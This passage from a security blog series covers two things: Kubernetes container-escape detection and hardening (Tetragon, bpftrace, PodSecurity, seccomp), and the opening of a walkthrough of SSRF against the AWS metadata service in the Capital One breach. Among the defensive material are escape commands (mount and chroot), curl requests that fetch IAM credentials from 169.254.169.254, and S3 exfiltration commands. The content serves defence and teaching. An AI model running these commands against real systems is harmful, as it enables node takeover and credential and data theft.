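Running `silent_rules` with the four rule names above against the alert log from a simulation window gives the list of detections to investigate first.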

Tetragon: TracingPolicy for nsenter and Mount Syscalls

Tetragon attaches eBPF programs at LSM (Linux Security Module) hooks and kernel function entry/exit points. Falco, as used here, observes and alerts; Tetragon can also enforce in the kernel. A policy action can kill the offending process (Sigkill) or override the call's return value, rather than only alerting after the fact.

# Tetragon TracingPolicy: detect and optionally block container escape attempts
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: container-escape-detection
  # TracingPolicy is cluster-scoped; use kind TracingPolicyNamespaced to limit it to one namespace
spec:
  kprobes:
    # Hook 1: sys_mount — detect any mount() call from a container process
    - call: "sys_mount"
      return: false
      syscall: true
      args:
        - index: 0
          type: "string"     # source device (e.g. /dev/sda1)
        - index: 1
          type: "string"     # target mount point
        - index: 2
          type: "string"     # filesystem type
      selectors:
        # Only fire for container processes (not the container runtime itself)
        - matchNamespaces:
          - namespace: Pid
            operator: NotIn
            values:
              - "host_ns"       # Tetragon's keyword for the host namespace
          matchActions:
          - action: Post        # Post = log; change to Sigkill to enforce

    # Hook 2: execve of the nsenter binary
    # (with syscall: true, Tetragon resolves the architecture-specific symbol prefix)
    - call: "sys_execve"
      return: false
      syscall: true
      args:
        - index: 0
          type: "string"     # filename being executed
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - "/nsenter"
          matchActions:
          - action: Post

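    # Hook 3: write to /proc/self/exe, the runc CVE class indicator
    # Caveat: the kernel may resolve /proc/self/exe to the real binary path,
    # so validate on a test node that this Postfix match actually fires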
    - call: "vfs_write"
      return: false
      syscall: false
      args:
        - index: 0
          type: "file"
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - "/proc/self/exe"
          matchActions:
          - action: Sigkill   # Block immediately — no legitimate use case for this write

bpftrace: Quick Node-Level Validation

Before deploying Tetragon, you can validate that mount syscalls are observable from the host using bpftrace directly on a node:

# Run on the Kubernetes node (requires root or CAP_BPF)
# Safe observation mode — shows mount attempts from any process including containers

bpftrace -e '
tracepoint:syscalls:sys_enter_mount {
  printf("%-8d %-20s %-30s -> %-30s type=%s\n",
    pid, comm,
    str(args->dev_name),   // source device
    str(args->dir_name),   // mount target
    str(args->type));      // filesystem type
}
' 2>/dev/null
# Sample output:
# PID      COMM                 SOURCE                         TARGET                         TYPE
# 38471    bash                 /dev/sda1                      /mnt/host                      ext4
# 38471 and comm=bash from inside a container = escape attempt in progress

# Watch for nsenter executions across all processes on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
  if (str(args->filename) == "/usr/bin/nsenter" ||
      str(args->filename) == "/bin/nsenter") {
    printf("nsenter called: pid=%d ppid=%d comm=%s\n",
      pid, curtask->real_parent->pid, comm);
  }
}
' 2>/dev/null

What Kubernetes Audit Logs Show (and What They Miss)

Kubernetes audit logs record API server activity. They show pod creation with --privileged set — but only if you are watching pod spec creation events. They do not show anything that happens inside the container after it starts.

# Enable audit policy to capture pod creation with privileged spec
# /etc/kubernetes/audit-policy.yaml (excerpt)

apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  # Log pod creation at RequestResponse level (captures full spec)
  - level: RequestResponse
    resources:
      - group: ""
        resources: ["pods"]
    verbs: ["create", "update", "patch"]

  # Log exec into pods — this is the entry point for escape attempts
  - level: RequestResponse
    resources:
      - group: ""
        resources: ["pods/exec"]
    verbs: ["create"]

# Parse audit log for privileged pod creation
grep '"privileged":true' /var/log/kubernetes/audit.log | \
  jq -r '[
    .requestReceivedTimestamp,
    .user.username,
    .objectRef.namespace + "/" + .objectRef.name,
    "privileged=true"
  ] | join(" | ")'

# Or check recent Kubernetes Events. Events are not audit records, and this
# only matches events whose message happens to mention "privileged"
kubectl get events -A --field-selector reason=Created \
  -o json | \
  jq -r '.items[] |
    select(.message | contains("privileged")) |
    [.metadata.namespace, .involvedObject.name, .message] |
    join(" / ")'

The audit log gap is important to understand: audit logs are a first-alert layer for misconfigured pod creation, not a detection layer for in-progress escape. By the time you see a pods/exec event in audit logs, the attacker already has a shell. eBPF-based detection at the syscall level is what catches the escape itself.
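
A text match on `"privileged":true` also hits unrelated fields and misses nothing about which container set the flag. A structured pass over the audit log is more precise. This is a sketch under the assumption that the log is JSON lines recorded at Request or RequestResponse level (so `requestObject` is present); the function name is hypothetical.

```python
from __future__ import annotations

import json
from typing import Iterable, Iterator


def privileged_pod_requests(lines: Iterable[str]) -> Iterator[tuple[str, str, str, str]]:
    """Yield (timestamp, user, namespace/pod, container) for audit events
    whose request body sets securityContext.privileged to true."""
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # tolerate partial or non-JSON lines
        if not isinstance(event, dict):
            continue
        ref = event.get("objectRef") or {}
        if ref.get("resource") != "pods" or ref.get("subresource"):
            continue  # skip pods/exec, pods/log and non-pod resources
        body = event.get("requestObject") or {}
        if not isinstance(body, dict):
            continue  # e.g. JSON-patch bodies are lists
        spec = body.get("spec") or {}
        # On create, the pod name is often only present in the request body
        name = ref.get("name") or (body.get("metadata") or {}).get("name", "?")
        containers = (spec.get("containers") or []) + (spec.get("initContainers") or [])
        for container in containers:
            if (container.get("securityContext") or {}).get("privileged") is True:
                yield (
                    event.get("requestReceivedTimestamp", "?"),
                    (event.get("user") or {}).get("username", "?"),
                    f"{ref.get('namespace', '?')}/{name}",
                    container.get("name", "?"),
                )
```

Passing an open file handle for the audit log as `lines` streams the results without loading the whole file.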

Purple Phase: Structural Fixes

Fix 1: PodSecurity Admission — Enforce Restricted Profile

PodSecurity admission (built into Kubernetes 1.25+, replacing PodSecurityPolicy) enforces security profiles at the namespace level. The Restricted profile blocks --privileged, hostPID, hostNetwork, hostPath volumes, and requires dropping all capabilities.

# Enforce the Restricted PodSecurity profile on a namespace
# This blocks any pod that doesn't meet the criteria from scheduling
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    # enforce: pod is rejected at admission if spec violates Restricted
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    # audit: violations are logged but not rejected (useful for rollout)
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/audit-version: latest
    # warn: user gets a warning but pod is allowed (for migration)
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: latest

What Restricted profile blocks (relevant to escape paths):

# Settings that satisfy Restricted: apply them explicitly
# so that PodSecurity admission does not reject your workloads

securityContext:
  # Pod-level
  runAsNonRoot: true
  seccompProfile:
    type: RuntimeDefault    # or Localhost with a custom profile

containers:
  - securityContext:
      allowPrivilegeEscalation: false
      privileged: false          # blocks Path 1
      capabilities:
        drop: ["ALL"]            # no CAP_SYS_ADMIN, no CAP_NET_ADMIN
        add: []                  # Restricted permits adding only NET_BIND_SERVICE
      readOnlyRootFilesystem: true  # not required by Restricted; reduces attacker persistence options

# Pod spec — blocked by Restricted
spec:
  hostPID: false           # must be false (blocks Path 2)
  hostNetwork: false       # must be false
  hostIPC: false           # must be false
  volumes:                 # hostPath volumes blocked
    - name: app-data
      emptyDir: {}         # emptyDir, configMap, secret allowed; hostPath not
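
Before switching a namespace to enforce, manifests can be pre-checked in CI. The sketch below covers only the escape-relevant subset of the settings listed above; it is not the upstream PodSecurity implementation, and the function name is an assumption made for this example.

```python
from __future__ import annotations


def restricted_violations(spec: dict) -> list[str]:
    """Return human-readable problems for a pod spec (the dict under `spec`)."""
    problems = []
    for field in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(field):
            problems.append(f"{field} must not be true")
    for volume in spec.get("volumes") or []:
        if "hostPath" in volume:
            problems.append(f"volume {volume.get('name', '?')}: hostPath not allowed")
    pod_sc = spec.get("securityContext") or {}
    for container in spec.get("containers") or []:
        sc = container.get("securityContext") or {}
        name = container.get("name", "?")
        if sc.get("privileged"):
            problems.append(f"{name}: privileged must not be true")
        if sc.get("allowPrivilegeEscalation") is not False:
            problems.append(f"{name}: allowPrivilegeEscalation must be false")
        if "ALL" not in ((sc.get("capabilities") or {}).get("drop") or []):
            problems.append(f"{name}: capabilities.drop must include ALL")
        # Container-level settings override pod-level ones
        if not sc.get("runAsNonRoot", pod_sc.get("runAsNonRoot")):
            problems.append(f"{name}: runAsNonRoot must be true")
        profile = sc.get("seccompProfile") or pod_sc.get("seccompProfile") or {}
        if profile.get("type") not in ("RuntimeDefault", "Localhost"):
            problems.append(f"{name}: seccompProfile must be RuntimeDefault or Localhost")
    return problems
```

An empty list means the spec passes this subset; the admission controller remains the source of truth for the full profile.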

Rollout approach for existing clusters:

Start with warn mode on all namespaces, identify violations, remediate, then promote to enforce:

# Label all non-system namespaces with warn mode first
kubectl get namespaces -o json | \
  jq -r '.items[] |
    select(.metadata.name | test("^(kube-system|kube-public|kube-node-lease)$") | not) |
    .metadata.name' | \
  while read ns; do
    kubectl label namespace "$ns" \
      pod-security.kubernetes.io/warn=restricted \
      pod-security.kubernetes.io/warn-version=latest \
      --overwrite
    echo "Labeled $ns"
  done

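# Preview which namespaces have pods that would violate enforce mode
# (server-side dry run: prints warnings, changes nothing)
kubectl label --dry-run=server --overwrite ns --all \
  pod-security.kubernetes.io/enforce=restricted

# After promoting to enforce, rejected pods surface as FailedCreate events
kubectl get events -A --field-selector reason=FailedCreate \
  -o json | jq -r '.items[] | select(.message | contains("violates PodSecurity"))'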

Fix 2: RuntimeClass — Hardware-Level Isolation for Untrusted Workloads

For workloads that cannot run under Restricted profile (CNI plugins, monitoring agents, specific DaemonSets), the alternative is a stronger isolation boundary: a sandboxed runtime.

gVisor and Kata Containers put a layer between the container and the host kernel. gVisor intercepts system calls in a user-space kernel (the Sentry); Kata Containers runs each pod inside a lightweight virtual machine with its own guest kernel. In both cases, a container escape exploiting a kernel vulnerability or a privileged mount hits the sandbox boundary, not the host kernel.

# Define a RuntimeClass for gVisor (runsc)
# Requires gVisor installed on nodes with the runsc runtime handler
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc   # must match the handler name in containerd/crio config
scheduling:
  nodeSelector:
    runtime.gvisor: "true"   # only schedule on nodes that have gVisor
---
# Use the RuntimeClass in a pod spec
apiVersion: v1
kind: Pod
metadata:
  name: untrusted-workload
spec:
  runtimeClassName: gvisor   # all syscalls go through gVisor's sentry
  containers:
    - name: app
      image: untrusted-image:latest

# Kata Containers: hardware VM boundary, not just a user-space syscall interceptor
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: kata-containers
handler: kata-qemu

For operators: gVisor and Kata Containers have compatibility trade-offs. Not all syscalls are supported in gVisor (it implements a subset of the Linux ABI). Kata Containers have higher startup latency (VM boot time). Benchmark your specific workload before enforcing these on production-critical pods.

Fix 3: Seccomp Profile — Block the Syscalls That Enable Escape

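Even without gVisor, a custom seccomp profile can shrink the escape syscall surface. The allowlist below denies everything it does not name, so mount, unshare, setns, and pivot_root all fail. Note that it allows clone unconditionally; filtering clone by namespace flags would need an additional args rule. Treat it as a starting point and extend the allowlist to match what your application actually calls.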

{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": ["SCMP_ARCH_X86_64", "SCMP_ARCH_X86", "SCMP_ARCH_X32"],
  "syscalls": [
    {
      "names": [
        "accept", "accept4", "access", "arch_prctl",
        "bind", "brk", "capget", "capset",
        "chdir", "chmod", "chown", "clock_gettime",
        "clone",
        "close", "connect",
        "dup", "dup2", "dup3",
        "execve", "exit", "exit_group",
        "fchmod", "fchown", "fcntl",
        "fstat", "fstatfs", "fsync",
        "futex", "getcwd", "getdents64",
        "getegid", "geteuid", "getgid", "getgroups",
        "getpeername", "getpid", "getppid",
        "getrlimit", "getsockname", "getsockopt",
        "gettid", "gettimeofday", "getuid",
        "inotify_add_watch", "inotify_init1",
        "listen", "lseek", "lstat",
        "madvise", "mmap", "mprotect",
        "munmap", "nanosleep",
        "open", "openat",
        "pipe", "pipe2", "poll", "ppoll",
        "prctl", "pread64", "pwrite64",
        "read", "readlink", "readv",
        "recvfrom", "recvmsg", "recvmmsg",
        "rename", "rt_sigaction", "rt_sigprocmask",
        "rt_sigreturn", "sched_getaffinity",
        "select", "sendfile", "sendmsg", "sendto",
        "set_robust_list", "set_tid_address",
        "setgid", "setgroups", "setuid",
        "setsockopt", "shutdown",
        "socket", "socketpair",
        "stat", "statfs", "symlink",
        "tgkill", "time", "timerfd_create",
        "timerfd_settime", "truncate",
        "uname", "unlink", "unlinkat",
        "wait4", "waitid",
        "write", "writev"
      ],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}
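
A profile like this is easy to get subtly wrong, so it is worth checking mechanically which escape-relevant syscalls it still allows. The sketch below assumes the JSON layout shown above (`defaultAction` plus a `syscalls` list of `names`/`action` rules) and takes the first rule that names a syscall as decisive, which is a simplification; the helper names are illustrative.

```python
from __future__ import annotations

# Syscalls most relevant to the escape paths discussed in this post.
ESCAPE_SYSCALLS = ("mount", "umount2", "unshare", "setns", "pivot_root", "clone", "clone3")


def syscall_action(profile: dict, syscall: str) -> str:
    """Action of the first rule naming the syscall, else the profile default.
    Rules carrying argument filters are marked as conditional."""
    for rule in profile.get("syscalls") or []:
        if syscall in (rule.get("names") or []):
            action = rule.get("action", "")
            return f"{action} (conditional)" if rule.get("args") else action
    return profile.get("defaultAction", "")


def allowed_escape_syscalls(profile: dict) -> list[str]:
    """Escape-relevant syscalls the profile allows, conditionally or not."""
    return [
        name for name in ESCAPE_SYSCALLS
        if syscall_action(profile, name).startswith("SCMP_ACT_ALLOW")
    ]
```

Loading the profile with `json.load` and calling `allowed_escape_syscalls` on it shows at a glance that clone is still permitted without any flag filtering.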

Apply via pod spec:

spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: "container-escape-block.json"
      # Profile must be in /var/lib/kubelet/seccomp/ on each node

# Distribute the seccomp profile to all nodes via DaemonSet
# Example using a DaemonSet that copies the profile file on startup
# (or use the built-in RuntimeDefault, which blocks dozens of dangerous syscalls)

# RuntimeDefault blocks: mount, unshare, clone with new-ns flags,
# add_key, keyctl, request_key, pivot_root — adequate for most workloads
spec:
  securityContext:
    seccompProfile:
      type: RuntimeDefault

Fix 4: Network Policy — Contain the Blast Radius After Escape

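Even if a container is compromised, a network policy that prevents pods in the namespace from reaching the Kubernetes API server limits what the attacker can do with stolen credentials. NetworkPolicy applies to pod traffic: a process that has fully escaped into the node’s host network namespace is generally not covered by it, so treat this as containment for the stages before a full node escape and pair it with node-level firewall rules.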

# Deny all egress from application namespace to Kubernetes API server
# The API server typically runs on port 6443 on the control plane nodes
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-api-server-egress
  namespace: production
spec:
  podSelector: {}       # applies to all pods in namespace
  policyTypes:
    - Egress
  egress:
    # Allow DNS
    - ports:
        - protocol: UDP
          port: 53
    # Allow application traffic (customize per workload)
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: production
    # Explicitly: no rule allowing egress to control plane CIDR
    # This is a deny-by-absence — egress to control plane falls through to default deny

# Also block pod-to-pod communication across namespaces
# to prevent an escaped pod from pivoting to other workloads
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
    - Ingress
    - Egress
  # No ingress or egress rules = deny all
  # Add specific rules above this as needed

Fix 5: Node Isolation — Co-location Risk

An internet-facing pod and a pod with access to sensitive internal services should not share a node. If the internet-facing pod escapes, it reaches the node’s credentials and can pivot to anything else scheduled on that node.

# Use node selectors, taints, and tolerations to separate workload tiers

# Taint sensitive nodes so only specific workloads schedule there
kubectl taint nodes sensitive-node-1 workload-tier=sensitive:NoSchedule

# Internet-facing pods: dedicated public-tier nodes
# Internal/privileged pods: dedicated sensitive-tier nodes

# Pod spec for internet-facing workload — only schedules on public nodes
spec:
  nodeSelector:
    workload-tier: public
  tolerations: []   # No toleration for sensitive node taint

# Pod spec for sensitive workload — only schedules on sensitive nodes
spec:
  nodeSelector:
    workload-tier: sensitive
  tolerations:
    - key: workload-tier
      operator: Equal
      value: sensitive
      effect: NoSchedule
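
Taint and toleration matching is easy to misread, so it can help to model it before rolling out node tiers. This is a simplified sketch of the matching rules as commonly documented for Kubernetes (key, operator, value, effect); it ignores nodeSelector and PreferNoSchedule, and the function names are hypothetical.

```python
from __future__ import annotations


def tolerates(toleration: dict, taint: dict) -> bool:
    """True if a single toleration matches a single taint."""
    # An empty toleration effect matches every taint effect
    if toleration.get("effect") and toleration["effect"] != taint.get("effect"):
        return False
    operator = toleration.get("operator", "Equal")
    key = toleration.get("key")
    if not key:
        # An empty key is only meaningful with Exists and matches all taints
        return operator == "Exists"
    if key != taint.get("key"):
        return False
    if operator == "Exists":
        return True
    return toleration.get("value", "") == taint.get("value", "")


def can_schedule(tolerations: list[dict], taints: list[dict]) -> bool:
    """True if every NoSchedule/NoExecute taint on the node is tolerated."""
    return all(
        any(tolerates(toleration, taint) for toleration in tolerations)
        for taint in taints
        if taint.get("effect") in ("NoSchedule", "NoExecute")
    )
```

With the taint from the example above, a pod with no tolerations is kept off sensitive-node-1, while the sensitive workload's toleration lets it through. The nodeSelector still needs matching node labels, which the taint alone does not provide.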

⚠ Production Gotchas

Legitimate workloads that require --privileged or hostPID. CNI plugins (Cilium, Calico, Flannel node agents), node-local-dns, monitoring agents (node exporters, eBPF-based agents like Tetragon itself), and storage drivers often need elevated access. Blanket enforcement of Restricted profile without exceptions breaks these workloads. The approach: enforce Restricted on application namespaces; use a dedicated namespace for infrastructure DaemonSets with the Privileged policy (Baseline also rejects privileged containers and host namespaces) and compensate with Falco detection and node isolation.

Seccomp under Restricted blocks some monitoring agents. The Restricted profile requires a seccomp profile (RuntimeDefault or Localhost), and the runtime's default profile blocks several syscalls that APM agents and profiling tools use. Run strace -c -f ./your-agent to capture the syscall profile of your monitoring agent before enforcing Restricted. Common culprits: perf_event_open (used by profilers), ptrace (used by some debuggers), bpf (used by eBPF-based tools). Add these to an allowlist seccomp profile rather than running the agent without any profile.

runc CVEs require node patching, not policy. PodSecurity admission and Falco rules protect against configuration-based escapes. A vulnerability in runc, containerd, or the Linux kernel itself bypasses policy-based controls entirely. Keep container runtime versions current; enable automatic node OS patching (Bottlerocket, Flatcar Linux) if your infrastructure allows it. Subscribe to CVE feeds for containerd (containerd/containerd) and runc (opencontainers/runc) specifically.

hostPath volumes are a partial equivalent to --privileged. A pod without --privileged but with a hostPath volume mounting /etc or /var/lib/kubelet can read node credentials without needing to mount a block device. PodSecurity Restricted blocks hostPath entirely; Baseline allows it. Audit for hostPath volumes separately from --privileged.

RuntimeClass with gVisor has syscall compatibility gaps. Applications that use io_uring, certain socket options, or kernel modules will not work under gVisor’s sentry. Test in staging before deploying to production. The gVisor compatibility matrix is documented at gvisor.dev/docs/user_guide/compatibility — check it for any application that does direct filesystem I/O at high volume (databases, high-throughput queues) as the overhead may be unacceptable even if the syscalls are supported.

Quick Reference

Escape Path	Precondition	Detection Signal	Structural Fix
Privileged container → mount	`privileged: true`	Falco: mount syscall from container; Tetragon: sys_mount kprobe	PodSecurity Restricted enforce; seccomp blocks mount
hostPID + nsenter	`hostPID: true`	Falco: nsenter exec in container; audit log: pod creation with hostPID	PodSecurity Restricted; blocks hostPID
hostNetwork + IMDS	`hostNetwork: true`	CloudTrail: node role credentials used from an unexpected source IP	Enforce IMDSv2 hop limit 1; PodSecurity Restricted
runc CVE (CVE-2019-5736)	Unpatched runc	Tetragon: vfs_write to /proc/self/exe	Patch runc/containerd; use RuntimeClass (gVisor)
hostPath volume mount	hostPath to sensitive path	Falco: sensitive host file access; PodSecurity audit	PodSecurity Restricted (blocks hostPath)
Escaped → API server	Node credential access	Audit log: API calls from node IP at unexpected time	Network policy blocking node→API server egress

Key Takeaways

Kubernetes container escape starts at the kernel: --privileged, hostPID, and hostNetwork remove Linux namespace and cgroup isolation — the Kubernetes API cannot prevent what happens inside a process that runs with those flags
Two commands from privileged container to root on the node: mount /dev/sda1 /mnt/host and chroot /mnt/host /bin/bash — this is not a sophisticated exploit, it is a default kernel behavior
eBPF detection (Falco, Tetragon) operates at the syscall level and catches the escape in progress; Kubernetes audit logs only catch the misconfigured pod creation, not the exploitation
PodSecurity Restricted enforcement at the namespace level is the structural fix for configuration-based escapes — it blocks --privileged, hostPID, hostNetwork, and hostPath volumes before a pod schedules
runc-class CVEs are independent of configuration — node-level patching and RuntimeClass (gVisor/Kata) isolation are the controls, not policy enforcement
Network policy as a secondary layer limits post-escape lateral movement: a container that escapes to the node should not be able to reach the API server with stolen node credentials

What’s Next

Container escape requires access to a running pod. But what if the attacker didn’t need to exploit anything at runtime — they shipped the attack as a dependency your build pipeline trusted? EP09 covers supply chain attacks from SolarWinds to XZ Utils: how a malicious package or a compromised build step becomes arbitrary code execution before the container ever runs, the detection patterns that are specific to supply chain compromise (dependency confusion, typosquatting, malicious maintainer takeovers), and the SLSA framework controls that create a verifiable chain of custody from source to deployed artifact.


SSRF to Cloud Metadata: How IMDSv1 Enabled the Capital One Breach

June 22, 2026 by Vamshi Krishna Santhapuri

Reading Time: 15 minutes


TL;DR

An SSRF cloud metadata attack maps to OWASP A10: an attacker exploits a server-side request forgery vulnerability to reach 169.254.169.254, the EC2 Instance Metadata Service, and retrieve IAM role credentials without authentication
IMDSv1 (the only version available before November 2019) requires no authentication token; any HTTP request from the instance to the IMDS endpoint returns credentials, so SSRF anywhere in the stack is sufficient
Capital One (2019): a misconfigured WAF running on EC2 had an SSRF vulnerability → attacker hit the IMDS endpoint → retrieved IAM role credentials → enumerated and exfiltrated over 100 million customer records from S3; $190M settlement
IMDSv2 requires a PUT request to obtain a session token first, then a custom header carrying that token on every GET. A typical SSRF can only make the server issue a simple GET, so it cannot complete this flow; --http-tokens required is the one-line enforcement
Hop limit of 1 is the container-layer defense when tokens are required: the token response carries an IP TTL of 1, so it is dropped before it can cross the extra network hop into a container's network namespace
The structural fix is eliminating the credential entirely: OIDC workload identity replaces the attached IAM role with a dynamically issued, scoped token, leaving no IMDS credential to steal

OWASP Mapping: A10 — Server-Side Request Forgery (SSRF). The attacker causes the server to make a request to an unintended destination — in this case, the link-local metadata endpoint that returns cloud IAM credentials.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│                    SSRF → IMDS → CREDENTIAL CHAIN                       │
│                                                                         │
│   ATTACKER                                                              │
│      │                                                                  │
│      │  1. Discovers SSRF in web app (WAF, proxy, image fetch, etc.)    │
│      │                                                                  │
│      ▼                                                                  │
│   WEB APP / WAF (running on EC2)                                        │
│      │                                                                  │
│      │  2. App follows attacker-controlled URL                          │
│      │     GET http://169.254.169.254/latest/meta-data/                 │
│      │     iam/security-credentials/ROLE_NAME                          │
│      ▼                                                                  │
│   EC2 INSTANCE METADATA SERVICE (IMDSv1 — no auth required)            │
│      │                                                                  │
│      │  3. Returns JSON: AccessKeyId, SecretAccessKey, Token            │
│      ▼                                                                  │
│   ATTACKER (now has temporary IAM credentials)                          │
│      │                                                                  │
│      │  4. aws sts get-caller-identity → confirm identity               │
│      │  5. aws s3 ls → enumerate all accessible buckets                 │
│      │  6. aws s3 cp s3://target-bucket/ . --recursive                  │
│      ▼                                                                  │
│   100M+ customer records exfiltrated                                    │
│                                                                         │
│   ─────────────────────────────────────────────────────────────────     │
│   IMDSv2 BREAKS THIS CHAIN AT STEP 2                                    │
│   PUT /latest/api/token required first → SSRF can't follow             │
│   (SSRF typically cannot initiate a PUT before a GET)                   │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

The SSRF cloud metadata attack chain is short enough to fit in a single diagram because there are only three moving parts: the SSRF vulnerability, an unauthenticated metadata endpoint, and the IAM credentials waiting behind it. Remove any one of those three elements and the chain breaks. Capital One had all three.

The Incident: Capital One (2019)

In March 2019, an attacker exploited a misconfigured WAF that Capital One ran on AWS EC2. The WAF was deployed on an EC2 instance with an attached IAM role, which is standard practice and necessary for the WAF to interact with other AWS services.

The attacker, later identified as Paige Thompson (arrested July 2019, former AWS engineer), found an SSRF vulnerability in the WAF’s configuration. The exact misconfiguration has been described as a firewall rule that allowed the instance to make outbound requests to internal destinations, including the link-local metadata endpoint.

The attack chain, reconstructed from court documents and Capital One’s public disclosures:

1. Identify SSRF in WAF
   ├── WAF accepts HTTP requests and forwards them to backend
   └── Attacker crafts request that causes WAF to make outbound HTTP call
       to attacker-controlled destination — confirms SSRF exists

2. Target the IMDS endpoint
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       (link-local address, reachable only from within the EC2 instance)

3. Enumerate the attached role
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       → returns role name: "capital-one-waf-role" (illustrative)

4. Retrieve the credentials
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/capital-one-waf-role
       → returns: AccessKeyId, SecretAccessKey, Token, Expiration

5. Export credentials to attacker-controlled system
   └── The SSRF response body contains the JSON credential blob
       Attacker exfiltrates the JSON out-of-band

6. Use credentials from external system
   ├── aws configure (with stolen AccessKeyId, SecretAccessKey, Token)
   ├── aws sts get-caller-identity → confirm IAM role identity
   ├── aws s3 ls → lists all S3 buckets the role can see
   └── aws s3 cp s3://[capital-one-bucket]/ . --recursive
       → 106 million customer records
       → 140,000 Social Security numbers
       → 80,000 bank account numbers

IMDSv1 required no authentication. The WAF’s attached IAM role had s3:GetObject and s3:ListBucket permissions scoped broadly enough to reach the data buckets. The SSRF was the entry point; the unauthenticated metadata endpoint was the amplifier; the overly permissive IAM role was the impact multiplier.

Capital One paid a $190M settlement. IMDSv2 was not an option at the time: AWS released it in November 2019, about four months after the breach was discovered (July 2019), and IMDSv1 remained available afterwards. What the breach demonstrated was not a zero-day but a known architectural weakness that had been present since EC2 launched.

The lesson the industry took away: IMDSv1 has no authentication. Any SSRF vulnerability anywhere in your stack (in the application, in a WAF, in a sidecar, in a Lambda calling your EC2) is a straight line to your IAM role credentials. The SSRF doesn't need to be severe or complex. It just needs to reach 169.254.169.254.

Red Phase: How the Attack Works

What SSRF Is

Server-Side Request Forgery is a vulnerability class where an attacker can cause the server to make HTTP requests to destinations of the attacker’s choosing. The server acts as a proxy: the request originates from the server’s network context, not the attacker’s. This is what makes it dangerous in cloud environments — the server has access to link-local addresses, VPC-internal services, and cloud metadata endpoints that the attacker cannot reach directly from the internet.

SSRF surfaces in any feature that causes the server to fetch a URL on behalf of the user:
– Image URL upload/preview (e.g., “fetch this avatar URL”)
– Webhook configuration (server calls a URL you provide)
– PDF generation from URL
– Reverse proxies and WAFs with request-forwarding rules
– Server-side URL validation endpoints

Why the Metadata Endpoint Is the Target

169.254.169.254 is the IPv4 link-local address AWS reserves for the Instance Metadata Service (IMDS). It is only reachable from within the EC2 instance itself — not from the VPC, not from the internet. Every EC2 instance has it. No security group rule can block it because it does not traverse the VPC network stack. It is a hypervisor-level endpoint injected into the instance.

The IMDS endpoint serves instance-specific data: instance ID, AMI ID, region, availability zone, network interfaces — and, critically, the temporary credentials for any IAM role attached to the instance.

# (IMDSv1 — no token required, works with a plain curl)

# Step 1: Enumerate what's available under iam/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Output: the name of the attached IAM role
# Example output: MyApplicationRole

# Step 2: Retrieve the credentials for that role
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole

The response from Step 2 looks like this:

{
  "Code": "Success",
  "LastUpdated": "2019-03-22T18:03:30Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAQFAKEKEYIDEXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY",
  "Token": "FQoDYXdzEJr//////////wEa...very-long-session-token...==",
  "Expiration": "2019-03-23T00:03:30Z"
}

The values above are placeholders, but in a live response they are valid AWS temporary credentials. The Token field is the STS session token. All three values together authenticate as the IAM role attached to the instance, with whatever permissions that role has been granted, until the Expiration time passes.
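
To make the exposure window concrete, here is a minimal sketch that maps the fields of such a response onto the standard AWS environment variable names and computes how long the credential stays usable. The sample blob and the `to_env` and `seconds_until_expiry` helpers are illustrative assumptions; the key values are fake.

```python
import json
from datetime import datetime, timezone

# Fake values in the same shape as an IMDS credential response.
SAMPLE_RESPONSE = """
{
  "Code": "Success",
  "LastUpdated": "2019-03-22T18:03:30Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAEXAMPLEKEYID",
  "SecretAccessKey": "example-secret-not-real",
  "Token": "example-session-token-not-real",
  "Expiration": "2019-03-23T00:03:30Z"
}
"""


def to_env(credential_json: str) -> dict:
    """Map the IMDS response fields to the environment variables AWS tools read."""
    doc = json.loads(credential_json)
    if doc.get("Code") != "Success":
        raise ValueError("response does not contain usable credentials")
    return {
        "AWS_ACCESS_KEY_ID": doc["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": doc["SecretAccessKey"],
        "AWS_SESSION_TOKEN": doc["Token"],
    }


def seconds_until_expiry(credential_json: str, now: datetime) -> float:
    """Return how many seconds remain before the credential expires."""
    doc = json.loads(credential_json)
    expires = datetime.strptime(doc["Expiration"], "%Y-%m-%dT%H:%M:%SZ")
    return (expires.replace(tzinfo=timezone.utc) - now).total_seconds()


issued = datetime(2019, 3, 22, 18, 3, 30, tzinfo=timezone.utc)
print(sorted(to_env(SAMPLE_RESPONSE)))
print(seconds_until_expiry(SAMPLE_RESPONSE, issued) / 3600, "hours of validity")
```

For a defender, the second function is the useful one: it bounds how long a stolen credential keeps working if nothing revokes the role's sessions first.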

The Full Attack Chain

Step-by-step, with the commands an attacker would run after recovering credentials from an SSRF:

Step 1: Confirm the SSRF and find the metadata endpoint

# Attacker sends request that causes the vulnerable server to fetch a URL
# The exact mechanism depends on the vulnerability (webhook, image URL, etc.)
# For a Capital One-style WAF SSRF, this might be a crafted HTTP header

